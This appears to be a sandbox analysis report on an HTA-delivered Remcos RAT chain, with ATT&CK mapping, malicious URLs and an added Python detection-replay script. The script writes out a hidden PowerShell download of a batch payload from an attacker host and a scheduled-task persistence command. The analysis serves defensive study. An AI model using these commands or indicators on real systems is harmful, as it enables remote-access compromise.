Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0025E5F4 GetLocalTime,36_2_0025E5F4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0025E652 GetUserNameW,36_2_0025E652
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0023BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,36_2_0023BCD2
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,16_2_00406805
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob (CABD2A79A1076A31F21D253635CB039D4329A5E8 is the SHA-1 thumbprint of ISRG Root X1, the Let's Encrypt root. An AuthRoot write under powershell.exe is what Windows' automatic root-certificate update produces when a TLS connection chains to a root not yet in the local store, which is consistent with the x1.i.lencr.org lookup in the network section below; on its own this entry is not evidence of a malicious certificate install.)
Source: LinkHub.comBinary or memory string: WIN_81
Source: LinkHub.comBinary or memory string: WIN_XP
Source: LinkHub.com.28.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: LinkHub.comBinary or memory string: WIN_XPe
Source: LinkHub.comBinary or memory string: WIN_VISTA
Source: LinkHub.comBinary or memory string: WIN_7
Source: LinkHub.comBinary or memory string: WIN_8

Remote Access Functionality

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comMutex created: \Sessions\1\BaseNamedObjects\Rmc-3QMI88 (the Rmc- prefix followed by a short random suffix is the default Remcos mutex naming pattern)
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00282263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,36_2_00282263
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00281C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,36_2_00281C61
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F52263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,38_2_00F52263
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F51C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,38_2_00F51C61
MITRE ATT&CK matrix (reconstructed from the flattened table: each row reads left to right across the 14 tactic columns; bracketed digits are the signature-count badges shown in a cell, reproduced as extracted; cells without a badge are the matrix skeleton with no matching signature)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | [111] Scripting | [2] Valid Accounts | [1] Windows Management Instrumentation | [111] Scripting | [1] Exploitation for Privilege Escalation | [2] Disable or Modify Tools | [121] Input Capture | [2] System Time Discovery | Remote Services | [1] Archive Collected Data | [2] Ingress Tool Transfer | Exfiltration Over Other Network Medium | [1] System Shutdown/Reboot
Credentials | Domains | Default Accounts | [1] Native API | [1] DLL Side-Loading | [1] DLL Side-Loading | [1] Deobfuscate/Decode Files or Information | LSASS Memory | [1] Account Discovery | Remote Desktop Protocol | [1] Email Collection | [11] Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | [1] Command and Scripting Interpreter | [2] Valid Accounts | [2] Valid Accounts | [2] Obfuscated Files or Information | Security Account Manager | [3] File and Directory Discovery | SMB/Windows Admin Shares | [121] Input Capture | [1] Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | [1] Scheduled Task/Job | [1] Scheduled Task/Job | [21] Access Token Manipulation | [1] DLL Side-Loading | NTDS | [28] System Information Discovery | Distributed Component Object Model | [3] Clipboard Data | [1] Remote Access Software | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | [2] PowerShell | [2] Registry Run Keys / Startup Folder | [12] Process Injection | [111] Masquerading | LSA Secrets | [221] Security Software Discovery | SSH | Keylogging | [2] Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | [1] Scheduled Task/Job | [2] Valid Accounts | Cached Domain Credentials | [121] Virtualization/Sandbox Evasion | VNC | GUI Input Capture | [13] Application Layer Protocol | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | [2] Registry Run Keys / Startup Folder | [121] Virtualization/Sandbox Evasion | DCSync | [4] Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | [21] Access Token Manipulation | Proc Filesystem | [11] Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | [12] Process Injection | /etc/passwd and /etc/shadow | [1] System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1589232 | Sample: c2.hta | Start date: 11/01/2025 | Architecture: WINDOWS | Score: 100

Process tree reconstructed from the behavior graph (started processes nested under their parent; dropped files, DNS/IP contacts and triggered signatures listed per node; bracketed numbers are the created-registry-value / created-file badges drawn next to a process):

c2.hta (start node)
  DNS/IP: ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF; candwfarmsllc.com; 4 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Sigma detected: Remcos; 11 other signatures
  +-- mshta.exe [1]
  |     Signature: Suspicious powershell command line found
  |     +-- powershell.exe [15 16]
  |           DNS/IP: myguyapp.com 193.26.115.39:443 (local ports 49732, 49734), QUICKPACKETUS, Netherlands
  |           Dropped: C:\Users\user\AppData\Local\Temp\c2.bat (ASCII)
  |           Signatures: Drops large PE files; Powershell drops PE file
  |           +-- cmd.exe [3 2]
  |           |     Signatures: Suspicious powershell command line found; Drops PE files with a suspicious file extension; Uses schtasks.exe or at.exe to add and modify task schedules
  |           |     +-- msword.exe
  |           |     |     Signature: Multi AV Scanner detection for dropped file
  |           |     |     +-- cmd.exe
  |           |     |           Dropped: C:\Users\user\AppData\Local\...\Propose.com (PE32)
  |           |     |           +-- Propose.com
  |           |     |           |     DNS/IP: geoplugin.net 178.237.33.50:80 (local port 49830), ATOM86-ASATOM86NL, Netherlands
  |           |     |           |     Dropped: C:\Users\user\AppData\Local\...\LinkHub.com (PE32); C:\Users\user\AppData\Local\...\LinkHub.js (ASCII); C:\ProgramData\remcos\logs.dat (data)
  |           |     |           |     Signatures: Detected Remcos RAT; Drops PE files with a suspicious file extension; Installs a global keyboard hook
  |           |     |           |     +-- cmd.exe
  |           |     |           |     |     Dropped: C:\Users\user\AppData\Roaming\...\LinkHub.url (MS)
  |           |     |           |     |     +-- conhost.exe
  |           |     |           |     +-- cmd.exe
  |           |     |           |           +-- conhost.exe
  |           |     |           |           +-- schtasks.exe
  |           |     |           +-- conhost.exe
  |           |     |           +-- tasklist.exe
  |           |     |           +-- 9 other processes
  |           |     +-- powershell.exe
  |           |     |     Dropped: C:\Users\user\AppData\Local\...\msword.exe (PE32)
  |           |     |     Signature: Loading BitLocker PowerShell Module
  |           |     +-- powershell.exe [16]
  |           |     |     Dropped: C:\Users\user\AppData\Local\Temp\msword.zip (Zip)
  |           |     +-- 2 other processes
  |           |           Dropped: C:\Users\user\Downloads\W2.pdf (PDF)
  |           |           +-- AcroCEF.exe [107]
  |           |                 +-- AcroCEF.exe
  |           +-- conhost.exe
  +-- wscript.exe
  |     Signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
  |     +-- LinkHub.com
  +-- wscript.exe
        +-- LinkHub.com
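The chain in the graph above (mshta.exe spawning powershell.exe, a batch stage writing PE files under .com names into AppData, schtasks.exe registering a wscript //B task, and a .url dropped into the Startup folder) is exactly the sequence the Sigma rules listed in this report key on. The following is an added example, not Joe Sandbox code: it replays that chain as Sysmon-style process-creation and file-creation events and runs the corresponding detections over them. The events are constructed from the behavior graph and timeline; PIDs are omitted, every command line except the scheduled-task action is an assumption, and the batch-file and script contents are stand-ins.

```python
"""Replay of the c2.hta chain above as Sysmon-style events, with the detections that
fire on it. Added example for this page, not Joe Sandbox code. Events are constructed
from the behaviour graph and timeline; every command line except the scheduled-task
action, and all file contents, are assumptions."""
import ntpath
import re
from dataclasses import dataclass

SCRIPT_EXT = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta")
PE_MASQ_EXT = (".com", ".pif", ".scr", ".cpl")          # PE under a non-.exe name
USER_DIRS = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\")
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}


@dataclass
class Event:
    kind: str                 # "process" (Sysmon EID 1) or "file" (Sysmon EID 11)
    image: str                # process: created image; file: the writing process
    parent_image: str = ""
    cmdline: str = ""
    path: str = ""            # file events: path written
    head: bytes = b""         # file events: first bytes written


def _base(p: str) -> str:
    return ntpath.basename(p).lower()


def _in_user_dir(s: str) -> bool:
    return any(d in s.lower() for d in USER_DIRS)


# Sigma "Suspicious MSHTA Child Process": an .hta has no business spawning an interpreter.
def mshta_child(ev: Event) -> bool:
    return (ev.kind == "process" and _base(ev.parent_image) == "mshta.exe"
            and _base(ev.image) in INTERPRETERS)


# Sigma "WScript or CScript Dropper": script host running a script out of a user-writable path.
def wscript_dropper(ev: Event) -> bool:
    return (ev.kind == "process" and _base(ev.image) in {"wscript.exe", "cscript.exe"}
            and _in_user_dir(ev.cmdline)
            and re.search(r"\.(?:js|jse|vbs|vbe|wsf)\b", ev.cmdline, re.I) is not None)


# Sigma "Suspicious Command Patterns In Scheduled Task Creation": /create whose action is a
# script host or interpreter, or whose target lives in a user-writable directory.
def suspicious_schtask(ev: Event) -> bool:
    c = ev.cmdline.lower()
    return (ev.kind == "process" and _base(ev.image) == "schtasks.exe"
            and "/create" in c and "/tr" in c
            and (any(h in c for h in ("wscript", "cscript", "mshta", "powershell", "rundll32"))
                 or _in_user_dir(c)))


# "Drops script at startup location": anything launchable written into the Startup folder.
def startup_drop(ev: Event) -> bool:
    p = ev.path.lower()
    return (ev.kind == "file" and "\\start menu\\programs\\startup\\" in p
            and p.endswith(SCRIPT_EXT + (".url", ".lnk", ".bat", ".cmd", ".exe")))


# "Drops PE files with a suspicious file extension": MZ header under .com/.pif/.scr in a user dir.
def pe_masquerade(ev: Event) -> bool:
    return (ev.kind == "file" and ev.head.startswith(b"MZ")
            and ev.path.lower().endswith(PE_MASQ_EXT) and _in_user_dir(ev.path))


RULES = {f.__name__: f for f in (mshta_child, wscript_dropper, suspicious_schtask,
                                 startup_drop, pe_masquerade)}


def detect(events):
    """Return (rule name, event index) for every rule that matches an event."""
    return [(name, i) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


LOCAL = r"C:\Users\user\AppData\Local"
EVENTS = [  # constructed replay of the report's chain, in timeline order
    Event("process", r"C:\Windows\SysWOW64\mshta.exe", r"C:\Windows\explorer.exe",
          r'mshta.exe "C:\Users\user\Desktop\c2.hta"'),
    Event("process", r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\SysWOW64\mshta.exe",   # command line assumed
          'powershell.exe -w hidden -c "iwr https://candwfarmsllc.com/c2.bat -OutFile $env:TEMP\\c2.bat"'),
    Event("file", "powershell.exe", path=LOCAL + r"\Temp\c2.bat", head=b"@echo off"),
    Event("process", r"C:\Windows\SysWOW64\cmd.exe", "powershell.exe", r"cmd /c " + LOCAL + r"\Temp\c2.bat"),
    Event("file", "cmd.exe", path=LOCAL + r"\Microsoft\Windows\INetCache\361684\Propose.com", head=b"MZ\x90\x00"),
    Event("process", LOCAL + r"\Microsoft\Windows\INetCache\361684\Propose.com", "cmd.exe"),
    Event("file", "Propose.com", path=LOCAL + r"\ConnectWare Technologies Ltd\LinkHub.com", head=b"MZ\x90\x00"),
    Event("file", "Propose.com", path=LOCAL + r"\ConnectWare Technologies Ltd\LinkHub.js", head=b"var "),
    Event("process", r"C:\Windows\SysWOW64\schtasks.exe", "cmd.exe",   # /sc and /mo assumed
          r'schtasks /create /tn Murray /tr "wscript //B \"' + LOCAL
          + r'\ConnectWare Technologies Ltd\LinkHub.js\"" /sc minute /mo 1 /f'),
    Event("file", "cmd.exe", head=b"[InternetShortcut]",
          path=r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url"),
    Event("process", r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\svchost.exe",
          r'wscript //B "' + LOCAL + r'\ConnectWare Technologies Ltd\LinkHub.js"'),
    Event("process", LOCAL + r"\ConnectWare Technologies Ltd\LinkHub.com", "wscript.exe"),
]

if __name__ == "__main__":
    for name, i in detect(EVENTS):
        ev = EVENTS[i]
        print(f"{name:20s} event {i:2d}: {ev.cmdline or ev.path}")
```

Six of the twelve events fire a rule; the benign-looking ones (the batch file itself, LinkHub.js, the AutoIt-built LinkHub.com starting under wscript) do not, which is why the file-extension and Startup-folder checks matter: they are what links the PE drops and the persistence to the mshta/powershell entry point.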

Antivirus detection, initial sample
Source | Detection | Scanner | Label
c2.hta | 11% | ReversingLabs | Win32.Trojan.Generic

Antivirus detection, dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | 0% | ReversingLabs | (none)
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | 0% | ReversingLabs | (none)
C:\Users\user\AppData\Local\Temp\msword\msword.exe | 16% | ReversingLabs | Win32.Backdoor.Generic

No Antivirus matches
No Antivirus matches

Antivirus detection, URLs (the trailing junk on several entries, such as W2.pdf9 or msword.zipqD, is memory-string residue around the real URL and is kept as the scanner keyed it)
Source | Detection | Scanner | Label
https://candwfarmsllc.com | 0% | Avira URL Cloud | safe
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGP | 100% | Avira URL Cloud | phishing
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROA | 100% | Avira URL Cloud | phishing
https://myguyapp.com/mt | 100% | Avira URL Cloud | phishing
https://candwfarmsllc.c | 0% | Avira URL Cloud | safe
https://candwfarmsllc.com/c2.bat | 100% | Avira URL Cloud | malware
https://myguyapp.com/W2.pdf9 | 100% | Avira URL Cloud | phishing
https://myguyapp.com/msw | 100% | Avira URL Cloud | phishing
https://myguyapp.com/W2.pdfG | 100% | Avira URL Cloud | phishing
https://myguyapp.com/msword.zipqD | 100% | Avira URL Cloud | phishing
https://myguyapp.com/W2.pdfsD | 100% | Avira URL Cloud | phishing
https://myguyapp.com/W2.pdf | 100% | Avira URL Cloud | phishing
http://candwfarmsllc.com | 0% | Avira URL Cloud | safe
https://myguyapp.com/msword.zipur | 100% | Avira URL Cloud | phishing
https://myguyapp.com/W2.p | 100% | Avira URL Cloud | phishing
https://myguyapp.com/msword.zipbN | 100% | Avira URL Cloud | phishing
https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERD | 100% | Avira URL Cloud | phishing
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
candwfarmsllc.com | 193.26.115.39 | true | true | (none) | unknown
geoplugin.net | 178.237.33.50 | true | false | (none) | high
me-work.com | 193.26.115.39 | true | false | (none) | high
myguyapp.com | 193.26.115.39 | true | false | (none) | high
x1.i.lencr.org | unknown | unknown | false | (none) | high
ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF | unknown | unknown | true | (none) | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://myguyapp.com/msword.zip | false | (none) | high
https://candwfarmsllc.com/c2.bat | true | Avira URL Cloud: malware | unknown
http://geoplugin.net/json.gp | false | (none) | high
https://myguyapp.com/W2.pdf | true | Avira URL Cloud: phishing | unknown
URLs from memory and binary strings
Name | Malicious | Antivirus Detection | Reputation | Source
https://candwfarmsllc.c | true | Avira URL Cloud: safe | unknown | mshta.exe, 00000000.00000003.1701548408.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1702282615.0000000005F12000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1704093551.0000000005F12000.00000004.00000020.00020000.00000000.sdmp
http://nuget.org/NuGet.exe | false | (none) | high | powershell.exe, 00000002.00000002.1695865250.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp
http://x1.i.lencr.org/ | false | (none) | high | 2D85F72862B55C4EADD9E66E06947F3D0.8.dr
https://myguyapp.com/msw | true | Avira URL Cloud: phishing | unknown | cmd.exe, 00000004.00000003.1682580513.000000000345D000.00000004.00000020.00020000.00000000.sdmp
https://myguyapp.com/mt | false | Avira URL Cloud: phishing | unknown | tasklist.exe, 00000013.00000003.2065519734.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068918634.000000000321A000.00000004.00000020.00020000.00000000.sdmp
https://myguyapp.com/msword.zipqD | false | Avira URL Cloud: phishing | unknown | cmd.exe, 0000001E.00000002.2092302096.0000000002B3A000.00000004.00000020.00020000.00000000.sdmp
http://pesterbdd.com/images/Pester.png | false | (none) | high | powershell.exe, 00000002.00000002.1693219999.0000000004D86000.00000004.00000800.00020000.00000000.sdmp
http://crl.microsoft | false | (none) | high | powershell.exe, 00000002.00000002.1690664991.0000000002D56000.00000004.00000020.00020000.00000000.sdmp
http://www.apache.org/licenses/LICENSE-2.0.html | false | (none) | high | powershell.exe, 00000002.00000002.1693219999.0000000004D86000.00000004.00000800.00020000.00000000.sdmp
https://go.micro | false | (none) | high | powershell.exe, 00000002.00000002.1693219999.000000000541F000.00000004.00000800.00020000.00000000.sdmp
https://myguyapp.com/W2.pdf9 | false | Avira URL Cloud: phishing | unknown | tasklist.exe, 00000013.00000003.2065519734.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068918634.000000000321A000.00000004.00000020.00020000.00000000.sdmp
https://contoso.com/License | false | (none) | high | powershell.exe, 00000002.00000002.1695865250.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp
https://contoso.com/Icon | false | (none) | high | powershell.exe, 00000002.00000002.1695865250.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROA | false | Avira URL Cloud: phishing | unknown | Propose.com, 0000001C.00000003.2087736160.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087958038.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087599132.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087186951.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087243889.00000000001A5000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2094480482.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087370625.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087769877.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2094550176.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087286049.00000000001A4000.00000004.00000020.00020000.00000000.sdmp
http://www.autoitscript.com/autoit3/X | false | (none) | high | Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000000.2081554510.0000000000485000.00000002.00000001.01000000.00000010.sdmp, LinkHub.com, 00000024.00000000.2103224867.00000000002D5000.00000002.00000001.01000000.00000012.sdmp, LinkHub.com, 00000026.00000000.2206840035.0000000000FA5000.00000002.00000001.01000000.00000012.sdmp, LinkHub.com.28.dr
